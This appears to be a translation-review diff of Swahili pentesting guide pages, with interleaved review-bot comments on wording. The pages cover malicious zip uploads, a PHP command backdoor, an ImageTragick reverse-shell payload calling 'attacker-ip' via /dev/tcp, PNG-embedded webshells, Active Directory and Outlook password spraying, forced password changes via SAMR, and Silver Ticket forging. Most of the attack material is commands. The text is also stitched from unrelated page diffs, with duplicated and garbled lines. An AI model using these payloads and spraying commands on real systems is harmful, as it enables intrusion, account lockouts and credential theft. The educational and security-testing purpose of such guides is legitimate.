Uundaji usiotarajiwa wa faili ndani ya folda wakati wa ufunguaji ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu ungeweza kuzuia OS-level command execution kupitia malicious file uploads, msaada wa compression wa hierarkia na uwezo wa directory traversal wa ZIP archive format unaweza kutumika vibaya. Hii inawawezesha washambulizi kupitisha vikwazo na kutoka kwenye folda za upload zilizo salama kwa kuyabadilisha kazi ya ufunguaji ya programu lengwa.
Exploit ya kiotomatiki ya kutengeneza faili kama haya inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
Exploit otomatiki ya kutengeneza faili hizo inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Vilevile, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa uendeshaji wake.
Zaidi ya hayo, the **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, tengeneza symlink ya faili hiyo kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa operesheni yake.
Hapo chini kuna mfano wa Python code inayotumika kuunda zip file yenye madhara:
Hapo chini kuna mfano wa Python code inayotumika kuunda malicious zip file:
```python
#!/usr/bin/python
import zipfile
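Review bot: the evilarc usage block in this hunk is fenced with a `python` language tag although it contains shell commands (`python2 evilarc.py -h`, `python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php`); tag it `bash` like the other command blocks on the page. Two context points worth a follow-up: the PNG magic string `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["` contains `\xs0`, which is not a valid hex escape (almost certainly `\x00`, the zero byte of the IHDR height field), and `Upload a link containing soft links to other files` should say `archive`, as the Swahili side already does (`Pakia archive yenye soft links`). The Swahili `Rejelea [https://en.wikipedia.org/wiki/List_of_file_signatures]` also lacks the link target the English line has.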
@ -254,11 +254,11 @@ zip.close()
create_zip()
```
**Abusing compression for file spraying**
**Kunyanyasa ukandamizaji kwa file spraying**
Kwa maelezo zaidi **angalia chapisho la asili katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
Kwa maelezo zaidi **angalia chapisho la awali katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1.  **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazotumwa kupitia `$_REQUEST` variable.
1.  **Creating a PHP Shell**: PHP code imeandikwa kutekeleza amri zinazopitishwa kupitia `$_REQUEST`.
```php
<?php
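Review bot: `**Kunyanyasa ukandamizaji kwa file spraying**` mistranslates the heading: `ukandamizaji` is oppression/suppression, not data compression, and `kunyanyasa` is to harass; the rest of this page keeps `compression` as a loanword (`yataendelea kuwepo baada ya compression`), so `**Kutumia vibaya compression kwa file spraying**` would be consistent. The two silentsignal lines differ only in `chapisho la asili` versus `chapisho la awali`; either is fine, but pick one.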
@ -268,14 +268,14 @@ system($cmd);
}?>
```
2.  **File Spraying and Compressed File Creation**: Faili nyingi zimetengenezwa na archive ya zip imeundwa ikijumuisha faili hizi.
2.  **File Spraying and Compressed File Creation**: Faili nyingi zinaundwa na archive ya zip inatengenezwa ikijumuisha faili hizi.
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3.  **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yanabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye directories.
3.  **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwa directories.
```bash
:set modifiable
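Review bot: in step 3, `Majina ya faili ndani ya zip yabadilishwa` drops the present-tense marker and reads as a subjunctive; the other side's `yanabadilishwa` is the correct form, and `kupita kwa directories` should stay `kupita kwenye directories`. The bash block is unchanged context and is consistent with the prose: the loop appends `xxA` ten times and copies `simple-backdoor.php` to each `xxA...cmd.php`, which is exactly the `xxA` to `../` substitution step 3 relies on.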
@ -285,40 +285,40 @@ root@s2crew:/tmp# zip cmd.zip xx*.php
## ImageTragic
Pakia yaliyomo haya kwa extension ya picha ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (kutoka kwenye [exploit](https://www.exploit-db.com/exploits/39767))
Pakia yaliyomo haya ukiwa na extension ya image ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (from the [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Kuingiza PHP Shell ndani ya PNG
## Kuingiza PHP Shell kwenye PNG
Kuingiza PHP shell katika IDAT chunk ya faili ya PNG kunaweza kwa ufanisi kuzipita baadhi ya operesheni za usindikaji wa picha. Fungsheni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum hapa, kwani mara nyingi hutumika kwa kubadilisha ukubwa na resampling ya picha, mtawalia. Uwezo wa PHP shell iliyowekwa kuendelea bila kuathiriwa na operesheni hizi ni faida muhimu kwa baadhi ya matumizi.
Kuingiza PHP shell katika IDAT chunk ya faili ya PNG kunaweza kupita kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Fungsheni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani kawaida hutumika kwa kubadilisha ukubwa (resizing) na kurejesha sampuli (resampling) picha, mtawalia. Uwezo wa PHP shell iliyowekwa kubaki bila kuathiriwa na operesheni hizi ni faida kubwa kwa matumizi fulani.
Uchambuzi wa kina wa mbinu hii, ukijumuisha metodolojia na matumizi yanayowezekana, umeelezewa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
Uchambuzi wa kina wa mbinu hii, ikiwa ni pamoja na metodolojia yake na matumizi yanayowezekana, umetolewa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa wa kina wa mchakato na athari zake.
More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Faili za Polyglot
## Polyglot Files
Faili za polyglot ni chombo cha kipekee katika usalama wa mtandao, zikifanya kazi kama chameleon zinazoweza kuwepo kwa uhalali katika miundo mingi ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), hybrid inayofanya kazi kama GIF na RAR archive. Faili hizi hazijafungwa kwa jozi hii pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Polyglot Files hutumika kama chombo maalum katika security, zikiw behaving kama chameleons zinazoweza kuwepo kwa uhalali katika miundo mingi ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na pia kama RAR archive. Faili hizo hazizuiliki kwa mchanganyiko huo tu; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Manufaa kuu ya faili za polyglot ni uwezo wao wa kuzunguka hatua za usalama ambazo huchuja faili kwa misingi ya aina. Kazi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili tu kwa upload—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na miundo inayoweza kuwa hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuzingatia vigezo vya muundo vya aina nyingi za faili, inaweza kwa utulivu kupita kizuizi hicho.
Faida kuu ya polyglot files iko katika uwezo wao wa kuzunguka udhibiti wa usalama unaochuja faili kwa msingi wa aina. Mazoezi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari zaidi inayotokana na miundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuzingatia vigezo vya muundo vya aina nyingi za faili, inaweza kupita vikwazo hivi kwa uwazi.
Licha ya ufanifu wao, polyglots hukutana na vizingiti. Kwa mfano, huku polyglot inaweza kuonyesha kwa wakati mmoja PHAR file (PHp ARchive) na JPEG, mafanikio ya upload yake yanaweza kutegemea sera za jukwaa kuhusu extension za faili. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udual wa muundo wa polyglot peke yake huenda usitosheleze kuhakikisha upload yake.
Licha ya urekebishaji wao, polyglots wanakabiliwa na vizingiti. Kwa mfano, wakati polyglot inaweza kuwakilisha kwa wakati mmoja faili ya PHAR (PHp ARchive) na JPEG, ufanisi wa kupakia inaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udualiti wa muundo tu wa polyglot huenda usitosheleze kuhakikisha kupakiwa kwake.
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
### Kupakia JSON sahihi kana kwamba ni PDF
### Upload valid JSONs like if it was PDF
Jinsi ya kuepuka utambuzi wa aina ya faili kwa kupakia faili ya JSON halali hata kama haikuruhusiwa kwa kudanganya kuwa PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
How to avoid file type detections by uploading a valid JSON file even if not allowed by faking a PDF file (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
- **`mmmagic` library**: Mradi tu biti za magic `%PDF` ziko katika 1024 za kwanza ni halali (angalia mfano kwenye chapisho)
- **`pdflib` library**: Ongeza fake PDF format ndani ya field ya JSON ili library ifikiri ni pdf (angalia mfano kwenye chapisho)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Tengeneza JSON kubwa zaidi ya hiyo ili haiwezi kuchambua maudhui kama json kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itafikiri ni PDF
- **`mmmagic` library**: As long as the `%PDF` magic bytes are in the first 1024 bytes it’s valid (get example from post)
- **`pdflib` library**: Add a fake PDF format inside a filed of the JSON so the library thinks it’s a pdf (get example from post)
- **`file` binary**: It can read up to 1048576 bytes from a file. Just create a JSON bigger than that so it cannot parse the content as a json and then inside the JSON put the initial part of a real PDF and it’ll think it’s a PDF
## Marejeo
## Marejeleo
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
- [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
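Review bot: "zikiw behaving kama chameleons" in the rewritten polyglot paragraph is garbled (a half-typed Swahili verb followed by an English one); the wording it replaces, "zikifanya kazi kama chameleon", was correct and should be kept. In the same paragraph block, "Licha ya urekebishaji wao" (like the older "ufanifu") does not render "despite their flexibility"; "Licha ya unyumbufu wao" does.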
@ -5,16 +5,16 @@
## **Password Spraying**
Mara unapopata kadhaa za **valid usernames**, unaweza kujaribu **common passwords** (kumbuka password policy ya mazingira)\
Kwa chaguo-msingi, **minimum** **password** **length** ni **7**.
Mara tu unapopata kadhaa za **valid usernames**, unaweza kujaribu **common passwords** za kawaida zaidi (kumbuka password policy ya mazingira) kwa kila mtumiaji uliogunduliwa.\
Kwa **default** the **minimum** **password** **length** ni **7**.
Orodha za **common usernames** pia zinaweza kuwa muhimu: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Kumbuka kwamba unaweza lockout baadhi ya accounts ikiwa utajaribu several wrong passwords (kwa chaguo-msingi zaidi ya 10).
Kumbuka kwamba **could lockout some accounts if you try several wrong passwords** (kwa default zaidi ya 10).
### Pata password policy
Ikiwa una some user credentials au shell kama domain user unaweza kupata password policy kwa:
Kama una baadhi ya **user credentials** au **shell** kama **domain user** unaweza **get the password policy with**:
```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
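Review bot: two of the rewritten lines fall back into English inside bold spans where the previous wording was fully Swahili: "Kumbuka kwamba **could lockout some accounts if you try several wrong passwords**" and "unaweza **get the password policy with**:". Suggest "Kumbuka kwamba **unaweza kufunga baadhi ya akaunti ukijaribu password kadhaa zisizo sahihi**" and "unaweza **kupata password policy kwa**:". "Kwa **default** the **minimum** **password** **length** ni **7**" also keeps a stray English "the".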
@ -47,29 +47,29 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kubainisha idadi ya jaribio ili kuepuka kufungiwa):**_
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kuonyesha idadi ya majaribio ili kuepuka kufungiwa):**_
```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI; WAKATI MWINGINE HAIFANYI KAZI
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI, WAKATI MINGINE HAIFANYI KAZI
```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```
- Kwa moduli ya `scanner/smb/smb_login` ya **Metasploit**:
- Kwa kutumia module ya `scanner/smb/smb_login` ya **Metasploit**:
.png>)
- Kutumia **rpcclient**:
- Kwa kutumia **rpcclient**:
```bash
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```
#### Kutoka kwa Windows
#### Kutoka Windows
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) toleo lenye brute module:
```bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
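Review bot: "HAIPENDEKEZWI, WAKATI MINGINE HAIFANYI KAZI" introduces a typo; "wakati mwingine" is the correct form and the line being replaced already had it. In the spray bullet, "kuonyesha idadi ya majaribio" means "show the number of attempts", whereas the tool lets you specify it, so the earlier "kubainisha" was the right verb. Separately, the bare ".png>)" fragment after the Metasploit bullet is the tail of an image embed whose "![](<" opening and path are missing, so nothing will render there; restore the full link or drop the fragment.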
@ -77,19 +77,19 @@ done
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```
- Kwa [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuunda watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na itaweka kikomo kwa idadi ya majaribio kulingana nayo):
- Kwa kutumia [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuzalisha watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na kupunguza majaribio kulingana nayo):
```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
- Kwa [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
- Kwa kutumia [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
```
Invoke-SprayEmptyPassword
```
### Tambua na Uchukue Udhibiti wa Akaunti "Password must change at next logon" (SAMR)
### Tambua na Uchukue Udhibiti wa Akaunti "Nywila lazima ibadilishwe wakati wa kuingia ufuatao" (SAMR)
Mbinu ya kimyakimya ni spray password isiyo hatari/tupu na kushika akaunti zinazorudisha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha kuwa password iliexpire kwa nguvu na inaweza kubadilishwa bila kujua ile ya zamani.
Mbinu yenye kelele ndogo ni kufanya spray password isiyo hatari/tupu na kugundua akaunti zinazorejesha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha kuwa password ilitimizwa kwa nguvu na inaweza kubadilishwa bila kujua password ya zamani.
Mchakato:
Workflow:
- Orodhesha watumiaji (RID brute via SAMR) ili kujenga orodha ya malengo:
{{#ref}}
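Review bot: "password ilitimizwa kwa nguvu" mistranslates "force-expired" ("kutimizwa" means to be fulfilled); "password iliisha muda kwa lazima" keeps the meaning. The rewritten heading also translates the literal status text "Password must change at next logon", which is the Windows/SAMR condition readers will search for; keep it in English as the heading it replaces did. "Workflow:" is likewise left in English where the previous line had "Mchakato:".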
@ -99,12 +99,12 @@ Mchakato:
# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
```
- Spray password tupu na endelea kwenye hits ili kunyakua accounts ambazo zinapaswa kubadilishwa wakati wa next logon:
- Spray password tupu na endelea kwenye hits ili kunasa akaunti ambazo zinatakiwa kubadilisha password zao wakati wa next logon:
```bash
# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
```
- Kwa kila hit, badilisha password kupitia SAMR kwa module ya NetExec (hakuna old password inahitajika wakati "must change" imewekwa):
- Kwa kila hit, badilisha password kupitia SAMR kwa kutumia NetExec’s module (hakuna old password inahitajika wakati "must change" imewekwa):
```bash
# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
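Review bot: `env NEWPASS='P@ssw0rd!2025#' ;` does not set a shell variable: with no command argument `env` only prints its environment, so the `"$NEWPASS"` expansions in the `-M change-password -o NEWPASS="$NEWPASS"` and `--pass-pol` lines that follow expand to an empty string. Use a plain assignment `NEWPASS='P@ssw0rd!2025#'` (or `export NEWPASS=...`) instead. Minor: "kwa kutumia NetExec’s module" mixes an English possessive into the Swahili sentence; "kwa kutumia module ya NetExec", as in the line it replaces, reads cleanly.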
@ -113,21 +113,21 @@ netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"
# Validate and retrieve domain password policy with the new creds
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
```
Vidokezo vya operesheni:
- Hakikisha saa ya host yako iko sawa na saa ya DC kabla ya operesheni zinazotegemea Kerberos: `sudo ntpdate <dc_fqdn>`.
- [+] bila (Pwn3d!) katika baadhi ya modules (kwa mfano, RDP/WinRM) ina maana creds ni sahihi lakini akaunti haina interactive logon rights.
Vidokezo vya uendeshaji:
- Hakikisha saa ya mwenyeji wako iko sawa na ile ya DC kabla ya Kerberos-based operations: `sudo ntpdate <dc_fqdn>`.
- [+] bila (Pwn3d!) katika baadhi ya moduli (kwa mfano, RDP/WinRM) inamaanisha creds ni halali lakini akaunti haina interactive logon rights.
## Brute Force
```bash
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
```
### Kerberos pre-auth spraying na LDAP targeting na PSO-aware throttling (SpearSpray)
### Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)
Kerberos pre-auth–based spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaendana vizuri zaidi na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, injini ya pattern, na uelewa wa sera (domain policy + PSOs + badPwdCount buffer) ili kuspray kwa usahihi na kwa usalama. Inaweza pia ku-tag compromised principals katika Neo4j kwa BloodHound pathing.
Kerberos pre-auth–based spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaleta ulinganifu mzuri zaidi na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, pattern engine, na ufahamu wa sera (domain policy + PSOs + badPwdCount buffer) kufanya spraying kwa usahihi na kwa usalama. Pia inaweza ku-tag principals zilizodukuliwa katika Neo4j kwa BloodHound pathing.
Mawazo muhimu:
Key ideas:
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering ili kuacha buffer ya jaribio inayoweza kusanidiwa (kizingiti) na kuepuka kufunga watumiaji.
- Domain lockout policy + PSO-aware filtering ili kuacha buffer ya majaribio inayoweza kusanidiwa (threshold) na kuepuka kufunga watumiaji.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each user’s pwdLastSet.
- Throughput control with threads, jitter, and max requests per second.
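Review bot: this hunk moves two labels from Swahili back to English ("Kerberos pre-auth spraying na LDAP targeting na PSO-aware throttling" becomes the English heading, and "Mawazo muhimu:" becomes "Key ideas:"), the opposite direction from the rest of the commit; keep the Swahili versions, especially since the "Key ideas" bullets that follow are still untranslated context and the section would otherwise read entirely in English. "Hakikisha saa ya mwenyeji wako" is ambiguous for the attacking machine; "saa ya kompyuta yako" is clearer.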
@ -153,7 +153,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
```
Vidhibiti vya kujificha na usalama:
Vidhibiti vya usiri na usalama:
```bash
# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10
@ -161,11 +161,11 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```
Neo4j/BloodHound uboreshaji wa data:
Uboreshaji wa Neo4j/BloodHound:
```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```
Muhtasari wa mfumo wa pattern (patterns.txt):
Muhtasari wa mfumo wa patterns (patterns.txt):
```text
# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
@ -176,27 +176,27 @@ Muhtasari wa mfumo wa pattern (patterns.txt):
```
Available variables include:
- {name}, {samaccountname}
- Temporal from each user’s pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and org token: {separator}, {suffix}, {extra}
- Muda kutoka kwa pwdLastSet ya kila mtumiaji (au whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Vifaa vya muundo na tokeni ya shirika: {separator}, {suffix}, {extra}
Operational notes:
- Pendelea kuuliza PDC-emulator kwa -dc ili kusoma badPwdCount yenye uhalali zaidi na taarifa zinazohusiana na sera.
- Urejeshaji wa badPwdCount unasababishwa kwenye jaribio lijalo baada ya dirisha la uchunguzi; tumia threshold na timing ili kuwa salama.
- Majaribio ya Kerberos pre-auth yanaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kujizungusha.
Vidokezo vya uendeshaji:
- Pendelea kuwasilisha maswali kwa PDC-emulator kwa kutumia -dc ili kusoma badPwdCount na taarifa za sera zinazoaminika zaidi.
- Urejeshaji wa badPwdCount unaanzishwa kwenye jaribio linalofuata baada ya dirisha la uchunguzi; tumia kizingiti na upangaji wa wakati ili kuwa salama.
- Majaribio ya Kerberos pre-auth yanaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kuendana na trafiki ya kawaida.
> Kidokezo: SpearSpray’s default LDAP page size is 200; rekebisha na -lps inapohitajika.
> Kidokezo: Saizi ya ukurasa wa LDAP inayotumika kwa SpearSpray ni 200; rekebisha kwa -lps inapohitajika.
## Outlook Web Access
There are multiples tools for p**assword spraying outlook**.
Kuna zana nyingi za p**assword spraying outlook**.
- Kwa kutumia [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa kutumia [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa kutumia [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa kutumia [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa kutumia [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
- Kwa [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na password / orodha ndogo ya passwords za spray.
Ili kutumia zana yoyote kati ya hizi, unahitaji orodha ya watumiaji na password / a small list of passwords to spray.
```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
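Review bot: the bold markers in "Kuna zana nyingi za p**assword spraying outlook**" are misplaced (the English line it replaces has the same fault); it should read "**password spraying outlook**". "unahitaji orodha ya watumiaji na password / a small list of passwords to spray" leaves the second half in English, whereas the previous "orodha ndogo ya passwords za spray" was fully translated and should stay.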
@ -215,7 +215,7 @@ Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na password / oro
- [https://github.com/Rhynorater/Okta-Password-Sprayer](https://github.com/Rhynorater/Okta-Password-Sprayer)
- [https://github.com/knavesec/CredMaster](https://github.com/knavesec/CredMaster)
## Marejeo
## Marejeleo
- [https://github.com/sikumy/spearspray](https://github.com/sikumy/spearspray)
- [https://github.com/TarlogicSecurity/kerbrute](https://github.com/TarlogicSecurity/kerbrute)
@ -6,14 +6,15 @@
## Silver ticket
Shambulio la **Silver Ticket** linahusisha matumizi mabaya ya service tickets katika Active Directory (AD) mazingira. Mbinu hii inategemea **kupata NTLM hash ya service account**, kama account ya kompyuta, ili kutengeneza Ticket Granting Service (TGS) ticket. Kwa ticket hii iliyotengenezwa, mshambuliaji anaweza kupata huduma maalumu kwenye mtandao, **kujifanya mtumiaji yeyote**, kwa kawaida akilenga vibali vya kiutawala. Inasisitizwa kwamba kutumia AES keys kutengeneza tiketi ni salama zaidi na kunagundulika kwa shida.
Shambulio la **Silver Ticket** linahusisha matumizi mabaya ya service tickets katika mazingira ya Active Directory (AD). Njia hii inategemea **kupata NTLM hash ya akaunti ya huduma**, kama vile akaunti ya kompyuta, ili kutengeneza Ticket Granting Service (TGS) ticket. Kwa tiketi hii iliyotengenezwa kwa ulaghai, mshambuliaji anaweza kupata huduma maalum kwenye mtandao, **kuigiza mtumiaji yoyote**, kwa kawaida akilenga vibali vya kiutawala. Inasisitizwa kwamba kutumia AES keys kwa kutengeneza tiketi ni salama zaidi na inayotambulika kwa ukosefu mdogo.
> [!WARNING]
> Silver Tickets zinaonekana kwa ugunduzi mdogo kuliko Golden Tickets kwa sababu zinahitaji tu **hash ya service account**, sio akaunti ya krbtgt. Hata hivyo, zimepungukiwa kwa huduma maalumu wanayolenga. Aidha, ikiwa utaiba nenosiri la akaunti yenye SPN unaweza kutumia nenosiri hilo kuunda Silver Ticket inayojifanya mtumiaji yeyote kwa huduma hiyo.
> Silver Tickets ni ngumu kugunduliwa kuliko Golden Tickets kwa sababu zinahitaji tu **hash ya akaunti ya huduma**, si akaunti ya krbtgt. Hata hivyo, zina kikomo kwa huduma maalum wanayolenga. Pia, hata kuiba tu nenosiri la mtumiaji kunaweza kutosha.
> Zaidi ya hayo, ikiwa utapora **nenosiri la akaunti lenye SPN** unaweza kutumia nenosiri hilo kutengeneza Silver Ticket inayomfanya mtu awe mtumiaji yoyote kwa huduma hiyo.
Kwa utengenezaji wa tiketi, zana tofauti zinatumiwa kulingana na mfumo wa uendeshaji:
Kwa kutengeneza tiketi, zana mbalimbali zinatumika kulingana na mfumo wa uendeshaji:
### Kwenye Linux
### On Linux
```bash
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
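Review bot: "inayotambulika kwa ukosefu mdogo" is not idiomatic for "less detectable"; "na ni vigumu zaidi kugunduliwa" carries the meaning. "mtumiaji yoyote" (twice in this hunk) should be "mtumiaji yeyote": "mtumiaji" is a person noun (m-/wa- class) and takes "yeyote", which the replaced lines had right.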
